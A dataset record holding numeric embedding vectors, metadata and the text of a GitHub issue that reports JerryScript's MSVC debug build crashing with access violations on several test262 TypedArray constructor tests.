0.008135565556585789, 0.00020932132611051202, 0.008050335571169853, -0.026467707008123398, -0.018316645175218582, 0.018657563254237175, -0.012249837629497051, 0.004296353552490473, -0.023895317688584328, -0.009623211808502674, -0.013350076042115688, -0.006109422538429499, 0.018084200099110603, 0.005338480696082115, -0.0068261269479990005, -0.012373807840049267, -0.017216406762599945, 0.002841636771336198, 0.003620326751843095, 0.013590268790721893, 0.012180103920400143, 0.011885673739016056, -0.015426581725478172, -0.001840187469497323, -0.027087559923529625, 0.0032949040178209543, 0.008964618667960167, 0.002086191438138485, 0.003083766670897603, 0.005435332655906677, -0.004350590519607067, 0.0077210390008986, 0.0032949040178209543, 0.01732488162815571, 0.0120328888297081, -0.015930213034152985, -0.010886161588132381, -0.005307488143444061, 0.0020513248164206743, -0.010963642969727516, -0.006326370872557163, -0.012164607644081116, 0.005187391769140959, 0.014403825625777245, -0.007538957521319389, -0.007019830867648125, -0.003496356075629592, 0.02440669760107994, -0.004765117075294256, 0.0038101566024124622, 0.022671109065413475, 0.00571814039722085, 0.016550064086914062, -0.004125894047319889, -0.017386866733431816, 0.008584958501160145, -0.013505038805305958, -0.0026053180918097496, 0.0019409134984016418, -0.007515713106840849, -0.03846185654401779, -0.012001896277070045, 0.007996099069714546, -0.003482796950265765, -0.007364623714238405, 0.0012561701005324721, 0.002895873971283436, -0.010963642969727516, 0.005551555193960667, 0.012815453112125397, 0.00974718201905489, 0.014241114258766174, -0.006004822440445423, 0.0019263856811448932, 0.006737023126333952, 0.01878153532743454, 0.01653456874191761, -0.005369473248720169, 0.01716991700232029, -0.0120328888297081, 0.0076241870410740376, 0.01107211783528328, -0.0003157374158035964, -0.013481794856488705, 0.007229031063616276, -0.01878153532743454, -0.0296909399330616, 0.012056133709847927, 0.01847160793840885, 0.030450260266661644, 0.0070818159729242325, -0.011529258452355862, -0.00372298969887197, -0.019215431064367294, 0.025320978835225105, 0.00883289985358715, 0.016674036160111427, -0.0142488619312644, 0.01268373429775238, -0.00696559390053153, -0.015930213034152985, -0.0038760160095989704, 0.05913393944501877, -0.0004394658317323774, 0.02719603292644024, 0.015775248408317566, -0.0034304969012737274, -0.0070663196966052055, -0.011947658844292164, -0.007457601837813854, -0.002998537151142955, -0.006136540789157152, 0.002961733378469944, 0.0012164607178419828, 0.0012348626041784883, -0.003083766670897603, -0.008197550661861897, 0.0070314533077180386, -0.0001054475869750604, -0.0025549549609422684, -0.0005607728962786496, -0.015914715826511383, -0.025413958355784416, -0.002756407018750906, 0.01991276629269123, -0.010940399020910263, -0.009840160608291626, 0.012993660755455494, 0.017588317394256592, -0.011901170015335083, 0.002988851862028241, 0.00850747711956501, 0.024701127782464027, -0.010893910191953182, -0.01288518588989973, -0.011831437237560749, 0.009971879422664642, 0.0240812748670578, 0.006760267540812492, 0.018797030672430992, 0.003217422403395176, 0.009096337482333183, -0.0019990247674286366, 0.018177177757024765, -0.024344712495803833, -0.0041646347381174564, -0.0050401766784489155, -0.001271666376851499, -0.012180103920400143, 0.0077481577172875404, 0.008894884958863258, 0.009638708084821701, 0.0004491510335355997, 0.0038004713132977486, -0.0053578512743115425, 0.0008329269476234913, -0.008259535767138004, 0.018440615385770798, 0.0059660812839865685, -0.017061443999409676, -0.0058382367715239525, -0.009452752768993378, -0.020346662029623985, -0.0011999959824606776, -0.0073839942924678326, -0.01630212366580963, -0.020765062421560287, 0.0071786679327487946, 0.00447456119582057, 0.006671163719147444, -0.0060629332438111305, 0.030620720237493515, -0.0008983020670711994, 0.004737998358905315, -0.020904529839754105, 0.008360262028872967, -0.01716991700232029, -0.01003386452794075, 0.024019289761781693, 0.007775276433676481, 0.011219331994652748, -0.0007646463345736265, 0.0014285666402429342, -0.014698254875838757, 0.019618336111307144, 0.002828077645972371, -0.00648133410140872, -0.0055050658993422985, -0.008848396129906178, -0.005381095688790083, -0.013497291132807732, 0.006392230279743671, 0.017603814601898193, -0.0043389685451984406, -0.009166070260107517, -0.0055825477465987206, 0.016596553847193718, -0.01099463552236557, -0.005439206957817078, -0.006093926262110472, 0.00835251435637474, -0.0011738459579646587, 0.015232877805829048, 0.003353015286847949, -0.017154421657323837, 0.009824664331972599, 0.011459525674581528, 0.010119093582034111, 0.0015002370346337557, 0.0032910299487411976, -0.0015941835008561611, 0.0028842517640441656, 0.01926192082464695, 0.0021152470726519823, -0.014744744636118412, 0.017247399315238, 0.022748591378331184, 0.009135077707469463, -0.01196315512061119, -0.0016377668362110853, 0.009816915728151798, 0.0036765008699148893, -0.004660516977310181, -0.012614000588655472, 0.0409102737903595, 0.021167967468500137, 0.009878900833427906, -0.005241628736257553, -0.009096337482333183, 0.022810576483607292, 0.00046271030441857874, 0.011722962372004986, -0.005009184125810862, -0.008468735963106155, 0.021942783147096634, 0.004377709235996008, -0.0071747940964996815, 0.014349588192999363, -0.008546218276023865, 0.03756307065486908, 0.013047897256910801, -0.015263870358467102, 0.0004825649375561625, 0.03074469044804573, -0.01529486384242773, -0.005644532851874828, -0.01741785928606987, 0.02986139990389347, -0.014760240912437439, 0.023771347478032112, -0.01981978677213192, -0.018037710338830948, -0.0011447903234511614, 0.03523861989378929, 0.02158636786043644, 0.006764141842722893, -0.003449867246672511, -0.006353489588946104, 0.0005723951617255807, 0.011769451200962067, 0.0044668130576610565, -0.014628522098064423, 0.012552015483379364, 0.006186903920024633, -0.0010963643435388803, 0.0038024084642529488, 0.007465349975973368, 0.0015980575699359179, -0.004234367981553078, -0.005989326164126396, 0.023290961980819702, 0.00790312048047781, -0.012141362763941288, -0.005249376874417067, 0.01692197658121586, -0.006977215874940157, -0.00010732409282354638, 0.02617327682673931, 0.020904529839754105, -0.006632423028349876, 0.012482281774282455, 0.007922491058707237, 0.025258993729948997, 0.0013656128430739045, -0.01582173816859722, 0.011242576874792576, 0.05361725017428398, -0.018502600491046906, -0.0011738459579646587, -0.002725414466112852, 0.008887137286365032, -0.005702644120901823, -0.0035583414137363434, -0.010862916707992554, -0.012412548996508121, 0.0029113702476024628, -0.013993172906339169, 0.005621288437396288, 0.0009956383146345615, 0.00851522572338581, 0.017200909554958344, 0.0039011973422020674, 0.0055980440229177475, -0.023306459188461304, -0.006237267050892115, 0.006675038021057844 ]
118
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision df6d430289692ffa0922b108a7229ccf4502b79b ###### Build platform ``` PS C:\work\study\languages\typescript\jerryscript> python -c "import platform; print(platform.platform())" Windows-10-10.0.19041-SP0 ``` ###### Build steps ```bat python tools/run-tests.py --test262-esnext=update --build-debug 2>err.txt ``` ###### Build log exit_code:3221225477 means C0000005 https://docs.microsoft.com/en-us/previous-versions/troubleshoot/visualstudio/foxpro/c0000005-error-troubleshoot ``` WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'buffer-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'buffer-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'length-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'length-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: ```
Fatal error detected by debug version with MSVC
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4463/comments
0
2021-01-15T05:26:26
2021-01-18T09:35:49Z
https://github.com/jerryscript-project/jerryscript/issues/4463
786,556,080
4,463
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Fatal error detected by debug version with MSVC Issue date: --- start body --- ###### JerryScript revision df6d430289692ffa0922b108a7229ccf4502b79b ###### Build platform ``` PS C:\work\study\languages\typescript\jerryscript> python -c "import platform; print(platform.platform())" Windows-10-10.0.19041-SP0 ``` ###### Build steps ```bat python tools/run-tests.py --test262-esnext=update --build-debug 2>err.txt ``` ###### Build log exit_code:3221225477 means C0000005 https://docs.microsoft.com/en-us/previous-versions/troubleshoot/visualstudio/foxpro/c0000005-error-troubleshoot ``` WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'buffer-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'buffer-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'length-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'length-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'no-args', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'object-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: WARNING:root:['built-ins', 'TypedArrayConstructors', 'ctors-bigint', 'typedarray-arg', 'custom-proto-access-throws'] negative:False exit_code:3221225477 stdout: stderr: ``` --- end body ---
3,359
[ -0.01463894173502922, -0.0030920656863600016, -0.010331222787499428, 0.020764663815498352, 0.022969631478190422, 0.01374819315969944, -0.012251443229615688, 0.04421617463231087, -0.029073448851704597, 0.017230873927474022, -0.015040508471429348, 0.005070695653557777, 0.019508853554725647, -0.004088682122528553, 0.004636273253709078, 0.01441990491002798, -0.04745791479945183, -0.011309586465358734, -0.022297918796539307, -0.014682749286293983, 0.027992868795990944, 0.027744628489017487, -0.008520521223545074, 0.036097221076488495, -0.03259263560175896, -0.004128838889300823, 0.012287949211895466, -0.00775389326736331, -0.0020279132295399904, -0.0020698951557278633, -0.00039540656143799424, -0.00255725160241127, -0.009206835180521011, -0.007016470190137625, 0.07593266665935516, 0.0075494591146707535, 0.04529675468802452, 0.0420842207968235, -0.0020279132295399904, -0.016135690733790398, -0.005753359757363796, -0.027394169941544533, -0.01883714273571968, 0.03238820284605026, 0.00926524493843317, 0.06308252364397049, 0.028869014233350754, -0.01550778653472662, -0.03598039969801903, 0.047136660665273666, 0.011674647219479084, -0.016515355557203293, 0.010404235683381557, -0.059052251279354095, 0.026810072362422943, -0.029307087883353233, 0.0223271232098341, 0.017157861962914467, 0.01125847827643156, 0.015843642875552177, 0.0007059365161694586, -0.011630839668214321, -0.014441808685660362, 0.004950225818902254, -0.0015369063476100564, 0.0685146301984787, -0.016865812242031097, 0.020910687744617462, -0.0006826638709753752, 0.00903890747576952, -0.02218109928071499, 0.003303800942376256, 0.03232979401946068, 0.029964197427034378, 0.03028545156121254, -0.045793239027261734, -0.017610536888241768, 0.026401203125715256, -0.0068521928042173386, -0.015332557260990143, -0.006461577955633402, 0.023305486887693405, -0.035221073776483536, 0.0007689095218665898, 0.014514820650219917, -0.008075146935880184, -0.020998302847146988, -0.06460117548704147, -0.020414205268025398, -0.007078530732542276, -0.015084316022694111, 0.04999873787164688, 0.011294984258711338, -0.004873563069850206, 0.00808974914252758, 0.002533522667363286, -0.02193285897374153, 0.007304868195205927, -0.059198275208473206, -0.005957793910056353, 0.012623805552721024, 0.028197303414344788, -0.010688982903957367, -0.0196840837597847, 0.024940960109233856, -0.011229272931814194, 0.013770096935331821, -0.0008108915062621236, 0.03714859485626221, 0.11179624497890472, -0.005906685255467892, -0.027467181906104088, -0.03157046437263489, -0.037557464092969894, 0.011002935469150543, 0.01574142463505268, 0.007096783723682165, -0.011112453415989876, -0.03527948260307312, -0.003230788977816701, -0.027700820937752724, -0.0035593437496572733, -0.02850395441055298, -0.013989132829010487, -0.034023676067590714, 0.03282627463340759, 0.027700820937752724, 0.0018855395028367639, 0.011302284896373749, 0.0027288300916552544, -0.052860815078020096, -0.01316409558057785, 0.016004269942641258, -0.012901252135634422, 0.027277350425720215, -0.02659103460609913, -0.013200601562857628, 0.02986198104918003, -0.007085831835865974, -0.03729461878538132, -0.030402271077036858, -0.022735992446541786, 0.015420172363519669, 0.007275663316249847, 0.009491583332419395, -0.025072382763028145, -0.023889584466814995, 0.02148018218576908, 0.0016592016909271479, -0.0028547761030495167, -0.033614806830883026, 0.0022688533645123243, 0.022166498005390167, -0.004209151957184076, 0.019216805696487427, 0.0037071933038532734, 0.0072355070151388645, 0.02765701338648796, -0.009374763816595078, -0.028591569513082504, -0.014368796721100807, -0.016573764383792877, 0.020107554271817207, -0.01765434443950653, -0.02749638631939888, 0.005001334007829428, 0.0024495585821568966, 0.036827340722084045, -0.014792267233133316, 0.0099296560510993, -0.014047542586922646, 0.008520521223545074, 0.024342259392142296, 0.03457856923341751, -0.03703177720308304, 0.013405036181211472, -0.004285814706236124, 0.041237279772758484, 0.004475646652281284, -0.043748896569013596, 0.03539630398154259, -0.0017513795755803585, -0.02425464615225792, -0.012324455194175243, 0.03574676066637039, -0.02911725640296936, 0.008827172219753265, -0.022852811962366104, 0.02648881822824478, -0.018574297428131104, 0.0015734124463051558, -0.01807781495153904, 0.0043004173785448074, -0.004482947755604982, 0.03548391908407211, 0.016880415380001068, -0.01043344009667635, -0.014171663671731949, -0.00047321018064394593, -0.004413586109876633, 0.03939737007021904, -0.010864212177693844, -0.02308645099401474, -0.02732115611433983, -0.011200068518519402, -0.03910532221198082, -0.022867413237690926, 0.023451510816812515, 0.008863678202033043, -0.002115527866408229, -0.007731989491730928, 0.007899917662143707, 0.006005251780152321, -0.03793712705373764, -0.00802403874695301, 0.007731989491730928, 0.027613205835223198, 0.0014292133273556828, -0.052714791148900986, -0.004632622469216585, 0.047282684594392776, -0.006651409436017275, -0.030110221356153488, -0.0003121270565316081, -0.08317547291517258, -0.004676430020481348, -0.0011006585555151105, -0.02634279429912567, -0.039484985172748566, 0.0036378316581249237, 0.009630306623876095, -0.03253422677516937, -0.03481220826506615, 0.015785232186317444, 0.04009828716516495, -0.0024294801987707615, -0.013200601562857628, -0.005023237783461809, -0.008965895511209965, 0.022108087316155434, 0.03598039969801903, 0.007651676423847675, -0.03174569457769394, -0.05616096779704094, 0.004555959720164537, 0.008411003276705742, -0.02117353118956089, 0.00730851897969842, -0.022721389308571815, -0.002540823770686984, -0.015580798499286175, -0.008600834757089615, -0.010856910608708858, -0.01544937677681446, -0.009141124784946442, 0.0006146712694317102, 0.0015478581190109253, 0.02292582392692566, -0.030168632045388222, -0.019742492586374283, -0.001726738060824573, 0.011667345650494099, -0.02971595712006092, 0.021071314811706543, 0.020253578200936317, 0.02162620797753334, -0.03738223388791084, 0.00400471780449152, -0.010951826348900795, -0.00830878596752882, 0.03779110312461853, -0.05540164187550545, -0.012645709328353405, 0.003946308046579361, -0.01118546538054943, -0.002115527866408229, 0.023612137883901596, 0.029818173497915268, -0.02088148333132267, -0.007392482832074165, 0.0191291905939579, 0.030227040871977806, 0.027394169941544533, 0.027715422213077545, 0.009571896865963936, 0.0021410821937024593, 0.027014505118131638, -0.012149226851761341, -0.019041575491428375, -0.02277979999780655, -0.019435841590166092, -0.01692422293126583, -0.003196108154952526, -0.0012548967497423291, 0.014149759896099567, -0.023144859820604324, -0.01043344009667635, -0.02203507535159588, -0.0029697702266275883, 0.015975063666701317, -0.02310105226933956, -0.03673972934484482, 0.0015679365023970604, -0.012441274709999561, -0.03341037407517433, -0.0050122858956456184, 0.05767961964011192, -0.0007360540330410004, 0.008053243160247803, -0.027248144149780273, 0.042989570647478104, -0.03013942763209343, -0.011492116376757622, -0.006680614314973354, -0.024152427911758423, -0.00800943560898304, 0.03960180655121803, -0.010163295082747936, -0.03761587291955948, 0.007797700818628073, -0.0326218418776989, -0.02497016452252865, -0.058438945561647415, -0.001219303347170353, 0.055343229323625565, -0.01604807749390602, -0.04001067206263542, 0.037440646439790726, -0.036827340722084045, -0.002973421011120081, 0.010783898644149303, -0.017289284616708755, -0.07307058572769165, -0.01926061324775219, -0.037732694298028946, -0.031220007687807083, -0.036126427352428436, 0.03335196152329445, 0.027102120220661163, -0.003553867805749178, -0.03221297264099121, 0.009250642731785774, -0.044771067798137665, 0.014149759896099567, -0.014244675636291504, -0.015040508471429348, -0.009214136749505997, -0.014967496506869793, 0.032271381467580795, 0.04266831651329994, 0.0009865770116448402, 0.0358927883207798, 0.022969631478190422, -0.0007004605722613633, 0.04223024472594261, -0.03954339399933815, -0.04833406209945679, -0.02840173803269863, 0.01835526153445244, 0.02365594543516636, -0.0048297555185854435, -0.027744628489017487, 0.015244943089783192, 0.004950225818902254, 0.002179413568228483, -0.01397453062236309, 0.002940565347671509, -0.03665211424231529, -0.040215108543634415, -0.00962300505489111, 0.0017522922717034817, 0.029657546430826187, -0.01718706637620926, -0.0015131774125620723, -0.030460679903626442, -0.06430912762880325, 0.007067578844726086, 0.007071229629218578, -0.027467181906104088, 0.023130258545279503, -0.009316354058682919, 0.012156527489423752, 0.021728424355387688, -0.051692623645067215, 0.018428273499011993, 0.010243608616292477, -0.02676626481115818, 0.020224373787641525, -0.02012215554714203, 0.0015880148857831955, -0.013492650352418423, 0.03320593759417534, -0.0388132743537426, -0.023451510816812515, -0.020209770649671555, 0.051546595990657806, -0.013492650352418423, -0.012835540808737278, 0.02193285897374153, -0.0329722985625267, -0.019041575491428375, -0.030051812529563904, 0.005056093446910381, -0.031950127333402634, -0.017303885892033577, 0.013857711106538773, -0.009820138104259968, -0.03399446979165077, 0.008578930981457233, 0.032709456980228424, 0.026941493153572083, -0.04179216921329498, 0.0005311635904945433, 0.02438606694340706, 0.03545471280813217, 0.03148284927010536, 0.035951197147369385, -0.029496919363737106, -0.036126427352428436, -0.01615029387176037, -0.006403168197721243, -0.020311987027525902, 0.030811138451099396, -0.003526488086208701, 0.020341193303465843, 0.004913719370961189, -0.03414049372076988, 0.014018338173627853, -0.006691566202789545, -0.02000533603131771, -0.05338650569319725, -0.022400137037038803, 0.030373066663742065, 0.05002794414758682, 0.0006133022834546864, -0.0358927883207798, 0.030373066663742065, -0.02498476766049862, -0.0397186242043972, -0.0033695120364427567, 0.01851588860154152, 0.020516421645879745, -0.008505919016897678, -0.03776189684867859, -0.01603347435593605, 0.008717654272913933, -0.055664483457803726, 0.02001993916928768, 0.007001867983490229, 0.013645975850522518, 0.016500752419233322, 0.019888516515493393, 0.0037272716872394085, -0.012200335040688515, 0.01838446594774723, 0.012419371865689754, -0.02280900441110134, -0.0017741959309205413, 0.03215456381440163, -0.023305486887693405, 0.013616771437227726, -0.008367195725440979, 0.005249575711786747, 0.00845480989664793, -0.046114493161439896, 0.051809441298246384, 0.0043150195851922035, -0.04252229258418083, -0.0015642859507352114, -0.019158395007252693, 0.012521588243544102, -0.002296233084052801, 0.03469538688659668, 0.03527948260307312, -0.00554892560467124, -0.012390166521072388, 0.004442790988832712, -0.004731188993901014, 0.017289284616708755, -0.014463712461292744, 0.013989132829010487, -0.008513219654560089, -0.00537004554644227, 0.01971328817307949, 0.021655412390828133, 0.003402367467060685, 0.02999340184032917, -0.004333272576332092, 0.015347159467637539, 0.0028511255513876677, 0.007885315455496311, -0.005771612748503685, -0.006965361535549164, -0.03288468345999718, 0.0021483832970261574, -0.0010431614937260747, -0.008213870227336884, 0.002217744942754507, 0.027905253693461418, 0.020268181338906288, 0.033293552696704865, -0.04348605498671532, 0.0364476777613163, 0.030665114521980286, 0.0019421239849179983, -0.040536362677812576, -0.04155853018164635, 0.019742492586374283, 0.00720995245501399, -0.03452015668153763, 0.0010413362178951502, -0.05470072478055954, -0.011046742089092731, -0.023436909541487694, -0.0464649498462677, -0.033614806830883026, -0.007363277953118086, 0.01575602777302265, 0.043164800852537155, 0.015536991879343987, -0.0018645485397428274, -0.02853315882384777, -0.04497550055384636, 0.03592199087142944, 0.02250235341489315, -0.0073669287376105785, -0.014668146148324013, -0.021874448284506798, -0.040507156401872635, -0.026284383609890938, -0.03311832249164581, 0.032855480909347534, -0.005545274820178747, 0.04217183217406273, -0.006154926493763924, -0.003042782424017787, -0.01807781495153904, 0.026065347716212273, -0.008491315878927708, 0.002035214565694332, -0.01168924942612648, 0.023203270509839058, -0.020049143582582474, 0.010302018374204636, -0.005600034259259701, 0.020516421645879745, -0.005979697220027447, 0.017318489030003548, 0.006180481053888798, 0.042872749269008636, -0.012908552773296833, -0.018150826916098595, -0.025773297995328903, -0.007436290383338928, -0.01396722998470068, -0.02056022919714451, -0.01883714273571968, 0.019012371078133583, 0.013317421078681946, -0.00032421969808638096, -0.015843642875552177, 0.002049817005172372, 0.0012576347216963768, -0.005435756873339415, -0.016544559970498085, -0.03776189684867859, 0.011127055622637272, 0.04263911023736, -0.03913452848792076, 0.0014474664349108934, 0.02527681551873684, -0.014755761250853539, 0.011331490240991116, -0.030665114521980286, -0.022852811962366104, -0.006286348681896925, -0.00009126522490987554, -0.011886382475495338, -0.002946041291579604, -0.028328724205493927, 0.034636978060007095, -0.009754426777362823, -0.022823607549071312, 0.035951197147369385, -0.026269782334566116, -0.0440993569791317, 0.021684616804122925, -0.010608669370412827, 0.02000533603131771, -0.02634279429912567, -0.02483874373137951, -0.015069713816046715, 0.005289732478559017, 0.006822987925261259, 0.014726555906236172, -0.007856110110878944, 0.00814815890043974, 0.021100519225001335, 0.06425071507692337, -0.031220007687807083, 0.022852811962366104, 0.028299519792199135, -0.005198467057198286, -0.03530868887901306, -0.017566729336977005, 0.02882520854473114, -0.014244675636291504, -0.00204251566901803, -0.013207903131842613, 0.020545626059174538, -0.01869111694395542, -0.0010276463581249118, 0.03583437576889992, -0.02764241024851799, 0.013558361679315567, 0.00727931410074234, 0.005643841344863176, 0.007834206335246563, -0.025057779625058174, 0.023728957399725914, 0.025028575211763382, -0.031249212101101875, -0.0032088852021843195, -0.013638675212860107, 0.00012457702541723847, 0.053766168653964996, -0.004435489885509014, -0.02572949230670929, -0.0013005294604226947, -0.040507156401872635, -0.018749527633190155, -0.0071515426971018314, -0.0011088724713772535, -0.011200068518519402, -0.02352452278137207, 0.03247581794857979, 0.05525561794638634, 0.0018070513615384698, -0.01491638831794262, -0.02645961381494999, -0.015931257978081703, 0.004336923360824585, -0.02751098945736885, 0.01360946986824274, -0.02453209087252617, -0.0035118856467306614, 0.007122337818145752, 0.02075006067752838, -0.001562460558488965, 0.02280900441110134, 0.016077281907200813, -0.008418303914368153, 0.012828239239752293, -0.002761685522273183, 0.009542691521346569, -0.006490782834589481, 0.028270315378904343, 0.05087488517165184, -0.004329622257500887, -0.025233007967472076, -0.04821724072098732, -0.004534056410193443, 0.005545274820178747, -0.004840707406401634, 0.016734391450881958, -0.01736229658126831, -0.016281716525554657, 0.01067438069730997, -0.00009406021854374558, 0.037557464092969894, 0.008016737177968025, -0.0234077051281929, -0.015653811395168304, 0.023130258545279503, 0.012726022861897945, -0.030927957966923714, -0.00687409657984972, 0.015580798499286175, -0.015639208257198334, 0.004833406303077936, -0.016121089458465576, 0.022998835891485214, 0.014157061465084553, 0.006195083260536194, 0.00017705453501548618, -0.0018928407225757837, 0.0002557707775849849, 0.003475379664450884, -0.016077281907200813, -0.005552575923502445, 0.00004557556894724257, 0.03717780113220215, 0.03244661167263985, 0.024021007120609283, 0.001153592369519174, 0.002692324109375477, 0.021246543154120445, -0.030548295006155968, -0.027978265658020973, -0.029044244438409805, 0.0007355976849794388, -0.012346358969807625, -0.053912192583084106, 0.022166498005390167, -0.009995367377996445, 0.010586765594780445, 0.011273080483078957, -0.018895551562309265, 0.017610536888241768, 0.014084049500524998, 0.007042024750262499, 0.00695441011339426, -0.00934555847197771, 0.0107985008507967, -0.006147625390440226, -0.01896856352686882, 0.01588745042681694, 0.011791466735303402, -0.001800662837922573, 0.008805268444120884, -0.013740891590714455, 0.0054175034165382385, -0.0493854358792305, -0.031249212101101875, -0.0031157946214079857, -0.02542283944785595, 0.0075567602179944515, 0.029803570359945297, -0.018428273499011993, 0.012667613103985786, 0.0029058847576379776, -0.012397468090057373, 0.00970331858843565, 0.009790932759642601, -0.04780837520956993, 0.009301751852035522, -0.007658977527171373, -0.00577526306733489, 0.0364476777613163, 0.0026722457259893417, -0.004785948432981968, 0.028708389028906822, -0.02926328033208847, -0.00730851897969842, -0.00011864479165524244, -0.013901518657803535, -0.013726289384067059, -0.011207369156181812, -0.018296850845217705, 0.008710352703928947, 0.014230073429644108, 0.021392568945884705, 0.008922087959945202, -0.03130762279033661, 0.0037108438555151224, 0.004577863495796919, 0.02057483233511448, -0.006432373076677322, 0.01883714273571968, 0.009973463602364063, -0.002084497595205903, -0.0006406818865798414, 0.013215203769505024, 0.02218109928071499, 0.02586091309785843, -0.022443942725658417, 0.022239509969949722, -0.016398536041378975, 0.004946575034409761, -0.00019188513397239149, -0.00205711810849607, -0.00543940719217062, -0.05312366038560867, -0.012908552773296833, -0.014120555482804775, -0.02324707806110382, -0.025481250137090683, 0.0034078434109687805, -0.009637607261538506, 0.02822650782763958, -0.03291388973593712, 0.008797967806458473, -0.015843642875552177, 0.017844175919890404, 0.009396667592227459, -0.013010770082473755, 0.004161694087088108, -0.012543492019176483, 0.012696817517280579, 0.012105419300496578, -0.020837675780057907, -0.03414049372076988, 0.0251453947275877, -0.015960462391376495, -0.001371716265566647, -0.030986368656158447, -0.03399446979165077, 0.03466618061065674, -0.017902586609125137, -0.009075413458049297, 0.015317955054342747, 0.008681148290634155, -0.00903890747576952, -0.005231322720646858, 0.0015140899922698736, -0.009206835180521011, -0.020195167511701584, 0.015639208257198334, -0.02409401908516884, 0.01997613161802292, 0.0052933827973902225, -0.002674071118235588, -0.0014848851133137941, -0.009812836535274982, 0.00043328164611011744, 0.008505919016897678, -0.00000852046377985971, -0.002318136626854539, 0.017741959542036057, 0.02000533603131771, -0.026707854121923447, 0.0022670282050967216, 0.03130762279033661, -0.002524395938962698, 0.004121537320315838, 0.001308743259869516, 0.044332996010780334, -0.024765729904174805, 0.021670013666152954, 0.0028931074775755405, -0.030373066663742065, -0.013930723071098328, -0.011922888457775116, -0.01433229073882103, -0.0417337603867054, 0.007045675069093704, -0.0011371646542102098, 0.02324707806110382, -0.0358927883207798, 0.019508853554725647, -0.010615970939397812, 0.007147892378270626, 0.015420172363519669, 0.010528355836868286, -0.02145097777247429, -0.02791985683143139, -0.014952894300222397, 0.0037455246783792973, 0.002798191737383604, -0.02336389757692814, 0.03545471280813217, 0.009535390883684158, 0.018209237605333328, 0.030548295006155968, -0.021801436319947243, 0.015128123573958874, 0.016237908974289894, -0.01882253959774971, 